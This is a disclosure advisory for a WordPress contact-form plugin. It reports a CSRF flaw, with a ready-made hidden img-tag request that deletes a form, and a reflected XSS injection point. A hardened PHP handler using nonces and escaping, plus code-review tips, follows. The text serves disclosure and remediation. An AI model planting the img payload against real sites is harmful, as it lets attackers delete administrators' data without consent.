###########################################################
# Title: Wordpress ThinkIT plugin - CSRF / XSS
# Discovered by: Yashar shahinzadeh
# Vendor site: http://thinkoverit.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected version: 0.1
################################################################

Summary
========
1. CSRF - Delete a form
2. Cross site scripting

1. CSRF - Delete a form:
========================
The contact form ID can be read directly from the HTML page source, <input type="hidden" value="[ID]" name="toit-form-id"></input>, where [ID] is the form ID. The following crafted request may be used to delete the form completely:

<img src="http://[ WP ]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1">

Obviously, [ID] must be replaced with the target form's ID.

2. Cross site scripting:
========================
http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf

/** Yashar shahinzadeh **/
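Both findings come from the same root cause: the admin.php?page=toitcf handler acts on a GET parameter with no request token and echoes it back unescaped. The following is an added, hypothetical WordPress handler (not the ThinkIT plugin's own code; the function names toitcf_handle_delete, toitcf_render_page and toitcf_delete_form are assumptions) showing the two fixes a maintainer would apply: a nonce plus capability check on the delete action, and integer coercion plus output escaping for toitcf_current_id.

```php
<?php
// Added defensive example, not code from the ThinkIT plugin. The handler is a
// hypothetical reconstruction of the admin action described in the advisory:
// it deletes a contact form named by toitcf_current_id and echoes that id
// back into the admin page. Assumed names: toitcf_handle_delete,
// toitcf_render_page, toitcf_delete_form.

// Hardened deletion. The request must carry a nonce bound to the action and
// the form id, and the caller must hold the capability. A cross-origin
// <img src="...admin.php?...&action=delete"> cannot supply the nonce, so the
// CSRF in section 1 fails at check_admin_referer().
function toitcf_handle_delete() {
    if (!isset($_GET['action']) || $_GET['action'] !== 'delete') {
        return;
    }
    // Coerce the id to a non-negative integer before it reaches SQL or HTML.
    $form_id = isset($_GET['toitcf_current_id']) ? absint($_GET['toitcf_current_id']) : 0;
    if ($form_id === 0) {
        wp_die('Invalid form id.');
    }
    // Verifies the _wpnonce query argument for this action/id pair; dies on failure.
    check_admin_referer('toitcf_delete_form_' . $form_id);
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.');
    }
    toitcf_delete_form($form_id); // assumed plugin storage routine
    wp_safe_redirect(admin_url('admin.php?page=toitcf'));
    exit;
}

// Hardened rendering. The id is only ever output after absint() and
// esc_attr()/esc_html(), so toitcf_current_id=[XSS] from section 2 becomes 0
// and nothing attacker-controlled reaches the page. The delete link is built
// with wp_nonce_url() so legitimate clicks carry the token the handler demands.
function toitcf_render_page() {
    $form_id    = isset($_GET['toitcf_current_id']) ? absint($_GET['toitcf_current_id']) : 0;
    $delete_url = wp_nonce_url(
        admin_url('admin.php?page=toitcf&action=delete&toitcf_current_id=' . $form_id),
        'toitcf_delete_form_' . $form_id
    );
    echo '<input type="hidden" name="toit-form-id" value="' . esc_attr($form_id) . '">';
    echo '<a href="' . esc_url($delete_url) . '">Delete form ' . esc_html($form_id) . '</a>';
}

add_action('admin_init', 'toitcf_handle_delete');
```

When reviewing a plugin for this class of bug, grep for `$_GET`/`$_REQUEST` reads inside admin page callbacks and confirm each state-changing branch is preceded by check_admin_referer() or wp_verify_nonce() and each echo is wrapped in an esc_* function.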